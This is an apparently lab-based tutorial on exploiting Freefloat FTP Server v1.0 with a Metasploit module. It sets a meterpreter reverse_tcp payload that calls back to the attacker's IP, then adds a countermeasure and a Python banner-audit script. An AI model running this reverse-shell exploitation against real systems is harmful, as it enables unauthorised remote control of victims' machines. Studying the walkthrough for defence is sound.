Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP 3
Victim Vulnerable Application : Freefloat FTP Server v1.0
Attacker O.S : Backtrack 5 R1
Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)
This is another vulnerable application that I found while browsing Packet Storm. In this tutorial I will again explain, step by step and in detail, how to perform the attack using the Metasploit Framework.
1. Metasploit framework
3. Freefloat FTP server v1.0 (download from mediafire.com)
Attacker IP : 192.168.8.93
Victim IP : 192.168.8.91
1. The first step is to scan the network to find out whether anyone is running the vulnerable software. Let's say I already know there is a computer with port 21 (FTP) open at IP 192.168.8.91. Next I want to know what software it is running, so I perform a simple banner grab.
There it is 😛 the victim uses Freefloat FTP server.
2. Copy freefloat_ftp_apee_cmd.rb to the /pentest/exploits/framework/modules/exploits/remote/ folder.
cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/
3. Next, prepare the Metasploit console by running the msfconsole command, then load the exploit.
msf > use exploit/remote/freefloat_ftp_apee_cmd
msf exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
4. There are a few options you need to set when using this exploit (see picture below); to view all of the options, run the show options command.
Information :
set rhost 192.168.8.91 --> set your target IP address
set lhost 192.168.8.93 --> attacker computer IP address
set lport 443 --> port on your local computer used to handle the payload
1. As of the time I am writing this tutorial (11-9-2011) there is still no fix; you can temporarily switch to another FTP server application until the developer fixes it.
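To act on this countermeasure you first need to know which of your own hosts still run the server. The following is an added example, not part of the original tutorial: it reuses the banner grab from step 1 as an inventory check over hosts you administer. The function names, the match pattern and the sample greetings are assumptions constructed for illustration, since the tutorial's banner screenshot is not preserved here.

```python
import re
import socket
# Assumption: pattern for the product named in this tutorial; verify on a known install.
FLAGGED = [re.compile(r"freefloat\s+ftp\s+server.*\b1\.0", re.I)]

def parse_greeting(raw: bytes) -> str:
    """Join an RFC 959 greeting ("220-" continuation lines, "220 " final line)."""
    lines = raw.decode("latin-1").splitlines()
    if not lines or not re.match(r"220[ -]", lines[0]):
        raise ValueError("not an FTP 220 greeting")
    parts = []
    for line in lines:
        parts.append(line[4:] if re.match(r"220[ -]", line) else line)
        if line.startswith("220 "):  # space after the code ends the reply
            break
    return " ".join(p.strip() for p in parts if p.strip())

def is_flagged(greeting: str) -> bool:
    return any(p.search(greeting) for p in FLAGGED)

def read_greeting(host: str, port: int = 21, timeout: float = 3.0) -> bytes:
    """Read what the server sends on connect, up to its final 220 line."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        while not re.search(rb"(?m)^220 .*\n", data) and len(data) < 4096:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return data

def audit(hosts, port: int = 21) -> dict:
    """Map host -> (greeting, flagged); unreachable or non-FTP hosts get (None, False)."""
    results = {}
    for host in hosts:
        try:
            greeting = parse_greeting(read_greeting(host, port))
            results[host] = (greeting, is_flagged(greeting))
        except (OSError, ValueError):
            results[host] = (None, False)
    return results

# Constructed sample greetings (not captured from a real server).
SAMPLE_MULTI = b"220-Welcome\r\n220-FreeFloat Ftp Server (Version 1.00).\r\n220 Ready\r\n"
SAMPLE_OTHER = b"220 Example FTP daemon 3.2 ready\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_MULTI, SAMPLE_OTHER):
        print(is_flagged(parse_greeting(raw)), parse_greeting(raw))
```

Pass audit() the list of hosts in your own address range; any entry whose second field is True is a candidate for replacement with another FTP server.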
Hope it's useful 🙂